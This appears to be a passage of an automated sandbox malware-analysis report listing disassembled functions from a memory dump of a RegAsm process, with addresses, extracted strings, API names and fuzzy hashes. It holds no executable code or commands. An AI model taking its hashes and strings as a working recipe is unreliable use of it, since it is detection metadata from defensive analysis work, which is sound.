                                                                  • API String ID: 0-930265988
                                                                  • Opcode ID: 579144abd9ad0ecb759efeeddbf896163be559cf23dfe97a4952c1ee92b0f94d
                                                                  • Instruction ID: de19403edc75124fb8fa16651fcd35b7f7b8ffe125996a06d8df55fcce46686f
                                                                  • Opcode Fuzzy Hash: 579144abd9ad0ecb759efeeddbf896163be559cf23dfe97a4952c1ee92b0f94d
                                                                  • Instruction Fuzzy Hash: 6E12D1716087419FEB15CF18C880B2FBBE1ABC4314F588A2EF895873A2D739D845CB56
                                                                  Function 0042D56C Relevance: 3.1, Strings: 2, Instructions: 553COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$7654
                                                                  • API String ID: 0-3675246634
                                                                  • Opcode ID: 4ebe84494b6721855754e88454bd869297922db48c31a06956ead8982e28ba80
                                                                  • Instruction ID: 4bc0d7d0b4372d09d1f80951b4dd8e72c0f01cae245f05c3a22e09897f17cac6
                                                                  • Opcode Fuzzy Hash: 4ebe84494b6721855754e88454bd869297922db48c31a06956ead8982e28ba80
                                                                  • Instruction Fuzzy Hash: 02122370A08341DFD724CF28E89071ABBE2BF8A316F14896DE4D8973A2D775D904CB56
                                                                  Function 00403790 Relevance: 2.9, Strings: 2, Instructions: 445COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Inf$NaN
                                                                  • API String ID: 0-3500518849
                                                                  • Opcode ID: f3226641ccffb084b943e03a89841c171065b1cd8ecf88249c95162ffa2b7308
                                                                  • Instruction ID: cfcbd5781c5794fd878052524ebf2c83b7e2996ae9355b3ff982965262b6e72e
                                                                  • Opcode Fuzzy Hash: f3226641ccffb084b943e03a89841c171065b1cd8ecf88249c95162ffa2b7308
                                                                  • Instruction Fuzzy Hash: 7CE1D6B2A083019BC704CF29C48161BBBE5EBC4750F258A3EF899A73D0E774DD458B86
                                                                  Function 0041CFF0 Relevance: 2.9, Strings: 2, Instructions: 428COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$7654
                                                                  • API String ID: 0-3675246634
                                                                  • Opcode ID: c0f58f158a3409f8100f4a7b6bbb32796ecc7b37d8a9628118476fa5228a5e34
                                                                  • Instruction ID: 97e3d8432fa62b873f2236c54981c5df7dc0733d72ba7613edc951da59989f30
                                                                  • Opcode Fuzzy Hash: c0f58f158a3409f8100f4a7b6bbb32796ecc7b37d8a9628118476fa5228a5e34
                                                                  • Instruction Fuzzy Hash: D7A122B1904214DBD3219F14CC42BA773B4FF51359F08456EE88A873A2E739EC50C79A
                                                                  Function 0042D58E Relevance: 2.9, Strings: 2, Instructions: 396COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$7654
                                                                  • API String ID: 0-3675246634
                                                                  • Opcode ID: e4a64c07486ec4eee9284e1d1d98adb02db342f8a0de0245d192b4abb41fb210
                                                                  • Instruction ID: 5878a3ae7455ddbe66d1b8aab6ad714c336ee248068d822dee8781cd81fb895b
                                                                  • Opcode Fuzzy Hash: e4a64c07486ec4eee9284e1d1d98adb02db342f8a0de0245d192b4abb41fb210
                                                                  • Instruction Fuzzy Hash: 01D13770A08390DFD720CF24E89075AB7E2AF9A316F18496DE4D997392D375ED04CB1A
                                                                  Function 0042C390 Relevance: 2.9, Strings: 2, Instructions: 361COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: 7654$e
                                                                  • API String ID: 2994545307-2460420260
                                                                  • Opcode ID: f7c379ae5121c6bd7f5f3bf37a8e5cd38f458bbd85b3cc10accd3093f96a0b56
                                                                  • Instruction ID: 11945eaa199fbd2feb2a77c93107578b6d38bce28f05eb1bcc10d1619140c484
                                                                  • Opcode Fuzzy Hash: f7c379ae5121c6bd7f5f3bf37a8e5cd38f458bbd85b3cc10accd3093f96a0b56
                                                                  • Instruction Fuzzy Hash: 5AA1F0716083219FD710EF14E8D0A2FB7E1EF95354F94892EE98597352E338E841CB9A
                                                                  Function 00434DF6 Relevance: 2.8, Strings: 2, Instructions: 301COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: J(Z4$O<>5
                                                                  • API String ID: 0-1381569939
                                                                  • Opcode ID: 2b3eafb8382073a923ed8343f70dfa28e3e80688e5264b3e7f6cd2adb108814f
                                                                  • Instruction ID: 6565b98a73022d45040d5be856969b21091b835410caec50d7f7389bae59b378
                                                                  • Opcode Fuzzy Hash: 2b3eafb8382073a923ed8343f70dfa28e3e80688e5264b3e7f6cd2adb108814f
                                                                  • Instruction Fuzzy Hash: 78A17970508B818AE766CF39C050BA3FBE1AF1A305F54585ED4EB8B782C77AB405CB65
                                                                  Function 00437620 Relevance: 2.7, Strings: 2, Instructions: 225COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 004376A2
                                                                  • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00437805
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                  • API String ID: 0-2492670020
                                                                  • Opcode ID: 3062d5efe69ceb85abb1b62a397233c9323a09391f451b3eb2ef24bbef9aa3a1
                                                                  • Instruction ID: 6111d259e755e12c00d3ecab6662fed1963f18ecac40f8d090cae3b405bc9ae5
                                                                  • Opcode Fuzzy Hash: 3062d5efe69ceb85abb1b62a397233c9323a09391f451b3eb2ef24bbef9aa3a1
                                                                  • Instruction Fuzzy Hash: 61610573B1D9804BDB3C9A3D4C6226A7A435FDB334B2C936AE5F2C73E1D52988018345
                                                                  Function 0042A2F9 Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ,+$;9
                                                                  • API String ID: 0-1035581042
                                                                  • Opcode ID: fd429c52b9270381125f2c7ff991b4681d229a7dd8ccae4c976d6f9e66088ac5
                                                                  • Instruction ID: a8d1bfba6cff5693b5a22f2e246a050cfb9519439ae3469259881602220de6ad
                                                                  • Opcode Fuzzy Hash: fd429c52b9270381125f2c7ff991b4681d229a7dd8ccae4c976d6f9e66088ac5
                                                                  • Instruction Fuzzy Hash: 24715374108390CBD7208F24D940B6BB7F1FF86305F949A1EE9D987221EB79D810CB5A
                                                                  Function 0042A274 Relevance: 2.7, Strings: 2, Instructions: 202COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ,+$;9
                                                                  • API String ID: 0-1035581042
                                                                  • Opcode ID: 6c514a58eddc6375df67e0e40d0af6a33b7b51b1912c0f5f1b71658d682d6659
                                                                  • Instruction ID: d75497c7bc5a3c3f258d38026d720fbab9c12da0385263baf3a294c8c598bd3d
                                                                  • Opcode Fuzzy Hash: 6c514a58eddc6375df67e0e40d0af6a33b7b51b1912c0f5f1b71658d682d6659
                                                                  • Instruction Fuzzy Hash: 7E614374108390CBD7248F24E940B6BB7F1FF86305F949A5EE9D887221EB79D810CB5A
                                                                  Function 0044AF10 Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: @$MNOP
                                                                  • API String ID: 2994545307-2234187807
                                                                  • Opcode ID: e8eb8e7b710596d1c74c1b8591662db9ad2ca5a2e960669c0b6428914b1691a7
                                                                  • Instruction ID: 4cbe3da95016eb5cdb85334a5a7d98617c44c4b6d2decb90e9c5df58e2c316ea
                                                                  • Opcode Fuzzy Hash: e8eb8e7b710596d1c74c1b8591662db9ad2ca5a2e960669c0b6428914b1691a7
                                                                  • Instruction Fuzzy Hash: 773168709093009BE714DF15D880A2BBBF5EF9A319F14892EE98897351D339D914CB9A
                                                                  Function 00405400 Relevance: 1.8, Strings: 1, Instructions: 570COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %1.17g
                                                                  • API String ID: 0-1551345525
                                                                  • Opcode ID: d7b07ed70faec5ae0229b128cf20a3fd72730703604141df1a9ea8e470dfb83c
                                                                  • Instruction ID: a5a990b7d37f07a136729ee37501cef67c4ba19131cd56b77464573e07893e63
                                                                  • Opcode Fuzzy Hash: d7b07ed70faec5ae0229b128cf20a3fd72730703604141df1a9ea8e470dfb83c
                                                                  • Instruction Fuzzy Hash: 8A12D5B6A08B418BE7158E14C480727BBA2EFE0314F19867ED8596B3D1E779DC05CF4A
                                                                  Function 00426CA0 Relevance: 1.8, APIs: 1, Instructions: 255comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(0044EB80,00000000,00000001,0044EB70), ref: 00426CC9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID:
                                                                  • API String ID: 542301482-0
                                                                  • Opcode ID: 23a7ae71985ea26ccd963fc31c7aca8cae070c80405dbe57fff8fe91e8626e74
                                                                  • Instruction ID: aaa0f5ddf04a0fb17491854a9ed1dc8b5669499049bb0ea055afc95c03e17e5c
                                                                  • Opcode Fuzzy Hash: 23a7ae71985ea26ccd963fc31c7aca8cae070c80405dbe57fff8fe91e8626e74
                                                                  • Instruction Fuzzy Hash: 586100B53002149BDB20DB24DC92BB733B4FF81358F564519F9468B390E778E805C76A
                                                                  Function 00449390 Relevance: 1.6, Strings: 1, Instructions: 384COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: P
                                                                  • API String ID: 0-3110715001
                                                                  • Opcode ID: b4251f7723f8745f7b2b3e976eda3b15f31dcf2fd24cd5e3171029a2dd935bc3
                                                                  • Instruction ID: 3b4be68ae0bb154b0f5282f7702363db0b67a1e70ae851dab57422b1ed72f487
                                                                  • Opcode Fuzzy Hash: b4251f7723f8745f7b2b3e976eda3b15f31dcf2fd24cd5e3171029a2dd935bc3
                                                                  • Instruction Fuzzy Hash: DDD1F3729082609FE726CE18D88071FB6E1EB85718F15863DE8B5AB381C779DC06D7C6
                                                                  Function 00431370 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "
                                                                  • API String ID: 0-123907689
                                                                  • Opcode ID: ebf93012f695f814ea8beb274b67aa73a9487f93ba687a60f16075264e124bcf
                                                                  • Instruction ID: 4bf39b719c747955085c095eee2413a709a75f6ba2d808f9bf0869d59952773e
                                                                  • Opcode Fuzzy Hash: ebf93012f695f814ea8beb274b67aa73a9487f93ba687a60f16075264e124bcf
                                                                  • Instruction Fuzzy Hash: D6C12872A083009BD714CF25C491B6BB7E9AF88354F1C992FE896873A2D738DD44C796
                                                                  Function 0042DEF8 Relevance: 1.6, Strings: 1, Instructions: 338COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: B
                                                                  • API String ID: 0-3806887055
                                                                  • Opcode ID: 881487b94f34c037e028dc03176547ea1a1a34661b7e3cdf011bdcf23930bfef
                                                                  • Instruction ID: dda79431a7a381354eb7992f4da0d9bb5ed59ed8d5ad5917760c71f259a4ecc9
                                                                  • Opcode Fuzzy Hash: 881487b94f34c037e028dc03176547ea1a1a34661b7e3cdf011bdcf23930bfef
                                                                  • Instruction Fuzzy Hash: 0BA11972A087258BC718CF29D89172EB7E2ABC8304F49867DE9969B381DB74DC05C7C5
                                                                  Function 00434A2F Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: J(Z4
                                                                  • API String ID: 0-2186490230
                                                                  • Opcode ID: fe18fcb45f5b366845e43e8746b6da6e8f3690878024a1e1d554e777e3f5da93
                                                                  • Instruction ID: 0c3c6397971fbf39b577ab5acef299f8a17aa32554bf44bf17e31ec2f091a3f2
                                                                  • Opcode Fuzzy Hash: fe18fcb45f5b366845e43e8746b6da6e8f3690878024a1e1d554e777e3f5da93
                                                                  • Instruction Fuzzy Hash: 2CA16C70408B808AE7768F39C090BE3BBE1AF5A304F54585ED4EB87782D779B445CB29
                                                                  Function 00448BE0 Relevance: 1.5, Strings: 1, Instructions: 287COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: 4`[b
                                                                  • API String ID: 2994545307-3962175265
                                                                  • Opcode ID: 7c1ffdfd6f211eb12630ce37f48f9216b1596631e01dcc04855e3016ddde93aa
                                                                  • Instruction ID: 97e95ed95cf941e068c77a71b6c165310a897e915d1a1d564e8b1cc4d5c8788d
                                                                  • Opcode Fuzzy Hash: 7c1ffdfd6f211eb12630ce37f48f9216b1596631e01dcc04855e3016ddde93aa
                                                                  • Instruction Fuzzy Hash: F191C271A08301AFE720DB15DC81B6FB7E5EB85354F54482EF99897392EB38D840CB5A
                                                                  Function 0044B300 Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MNOP
                                                                  • API String ID: 0-783613192
                                                                  • Opcode ID: f8a5d3031550570b0cd3a611d554af8d361d789c8380b98dc8553ef19e6847e4
                                                                  • Instruction ID: 4c1b4c4b2e9fef75eb940f9395f2579c141d9abd29664ce630b25ef7d8d63037
                                                                  • Opcode Fuzzy Hash: f8a5d3031550570b0cd3a611d554af8d361d789c8380b98dc8553ef19e6847e4
                                                                  • Instruction Fuzzy Hash: 8B81B1342083059FE724DF29D880A2BB7E5FF95758F15892DE9858B352E738DC10CB9A
                                                                  Function 0044B020 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MNOP
                                                                  • API String ID: 0-783613192
                                                                  • Opcode ID: 3063f0f3f91d937777957b0289bf54ae34d1396810db12015069148717f2f1fe
                                                                  • Instruction ID: c4d83a5c95ce541db8a93265b5430b6c419164ec9e2e4709dc0e36d878027cf6
                                                                  • Opcode Fuzzy Hash: 3063f0f3f91d937777957b0289bf54ae34d1396810db12015069148717f2f1fe
                                                                  • Instruction Fuzzy Hash: B381BC306083009BE710DF58D891A2FB7E2FF85744F29886DE5858B361D779EC14CB9A
                                                                  Function 00445AD0 Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7654
                                                                  • API String ID: 0-4024152101
                                                                  • Opcode ID: be504536f038416e1d4edb752feac5bc805885ba2f8544c8c01de497c5e423c1
                                                                  • Instruction ID: 7a35ab28fd0a26b3948bf9f86ec2e013bb52480a85e17a240ad3ac06b8b658d9
                                                                  • Opcode Fuzzy Hash: be504536f038416e1d4edb752feac5bc805885ba2f8544c8c01de497c5e423c1
                                                                  • Instruction Fuzzy Hash: 4371E2716087419FEB15DF19C8C0B2BB7E6EF95314F18892EE99487392D238DC41CB5A
                                                                  Function 00414E26 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: SYA
                                                                  • API String ID: 0-4212776672
                                                                  • Opcode ID: 254f8b39bebb99d8ee5dccbeeadc484bb52319231fde44bda6536d8f9a50c579
                                                                  • Instruction ID: 7f879d4623d2c1102999ce86527e4d96d2f3d10b350c70f3ee8129f928f6a44f
                                                                  • Opcode Fuzzy Hash: 254f8b39bebb99d8ee5dccbeeadc484bb52319231fde44bda6536d8f9a50c579
                                                                  • Instruction Fuzzy Hash: D761A1B5A00700DFD7259F25E880A63B7F5FB95319F144A3DE08683762E739E885CB89
                                                                  Function 004489F0 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b
                                                                  • API String ID: 0-3962175265
                                                                  • Opcode ID: b5d023d62257a4c626440ddb3117fef597bce6b0240d556e5d7ff713d1724dd0
                                                                  • Instruction ID: b495b082d3e908edfd00f2f56cc7232502cc61b4d3337edbb305c0ef107e636d
                                                                  • Opcode Fuzzy Hash: b5d023d62257a4c626440ddb3117fef597bce6b0240d556e5d7ff713d1724dd0
                                                                  • Instruction Fuzzy Hash: BD514671608340AFE7149E09CC91B2FB7E6EB85725F188A2DF8D957391CA39EC01C796
                                                                  Function 00444970 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7654
                                                                  • API String ID: 0-4024152101
                                                                  • Opcode ID: 901b10082cde7f28194df08ba5b3adeadc5b986e246d2c14ebb31e824fbb1a25
                                                                  • Instruction ID: 6b218af450866b0fe99af1f7c51bb86148964a482ba403d1030a703d4783f96c
                                                                  • Opcode Fuzzy Hash: 901b10082cde7f28194df08ba5b3adeadc5b986e246d2c14ebb31e824fbb1a25
                                                                  • Instruction Fuzzy Hash: 3851CE742083409BE724DF14E880B2BBBE5EBC5305F18882EE9C997311D739EC10DB2A
                                                                  Function 0040E470 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 0040E5F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                                  • API String ID: 0-2471034898
                                                                  • Opcode ID: ddfdc7149270ff1530b2289e1383d721dd78681f1bfb949ebe86f553123317ed
                                                                  • Instruction ID: ccc2d30e64e97e097d375ac0de9d2e22b727f45c33e366729a74f9b94a1f59d5
                                                                  • Opcode Fuzzy Hash: ddfdc7149270ff1530b2289e1383d721dd78681f1bfb949ebe86f553123317ed
                                                                  • Instruction Fuzzy Hash: 98514E37A0A5A14BC3244E3E5C112A5AA460BA3334F2D8F77EDF5A73E1D12E4C264399
                                                                  Function 0042DFE0 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: B
                                                                  • API String ID: 0-3806887055
                                                                  • Opcode ID: dee7b1dee9328862052ad57725f35d79540aff3160e94df7c436ace43865785c
                                                                  • Instruction ID: 733f38e918fcb2dd5270b8569c0c3cc3d088bc41a3ce343992b8dfccbbb99759
                                                                  • Opcode Fuzzy Hash: dee7b1dee9328862052ad57725f35d79540aff3160e94df7c436ace43865785c
                                                                  • Instruction Fuzzy Hash: BB512C72F147358BC714CE2DD89072AB2D2ABC8305F8A467DDC5A9B382DE349C1587D5
                                                                  Function 0044AC00 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MNOP
                                                                  • API String ID: 0-783613192
                                                                  • Opcode ID: f4242dfef2de233e48016e83545519aca856ea02bbfc6a89d7122ee86ff49502
                                                                  • Instruction ID: ee6679273abafb4133ad51ca82e03e062317397a14a93a1c8e4187433cc692b4
                                                                  • Opcode Fuzzy Hash: f4242dfef2de233e48016e83545519aca856ea02bbfc6a89d7122ee86ff49502
                                                                  • Instruction Fuzzy Hash: E141C374648300AFF7549B14D881B2BB7A6EB85715F24882EF98947352D339DC20CB5B
                                                                  Function 0044AD90 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MNOP
                                                                  • API String ID: 0-783613192
                                                                  • Opcode ID: 5ced491ab1452905e1841d7bcce19d88781f5803ed5ce9cf4ca693d6db50da8a
                                                                  • Instruction ID: 0a56d986e06c91ed8a12d7fa27a988aa33714531a5a76d730050ec92aa7a375b
                                                                  • Opcode Fuzzy Hash: 5ced491ab1452905e1841d7bcce19d88781f5803ed5ce9cf4ca693d6db50da8a
                                                                  • Instruction Fuzzy Hash: BB418134688340AFF714DB15D881B2BB7A6EB85715F24882DF99997352C339DC20CB5B
                                                                  Function 00424490 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 80
                                                                  • API String ID: 0-1093746208
                                                                  • Opcode ID: 4d4fbab07c48a99c042bb332d07d745ff509867459e940bfbc226f5f481d4cde
                                                                  • Instruction ID: 3ec4b7595a72ad0e68ed4e3a28ec28138072276a7513f2fb7a742c8147458005
                                                                  • Opcode Fuzzy Hash: 4d4fbab07c48a99c042bb332d07d745ff509867459e940bfbc226f5f481d4cde
                                                                  • Instruction Fuzzy Hash: 412191746083109BD310AF18D951A2BB7F4EF96764F85491DE4D59B391E338C940CBAB
                                                                  Function 0040BF80 Relevance: .9, Instructions: 852COMMON
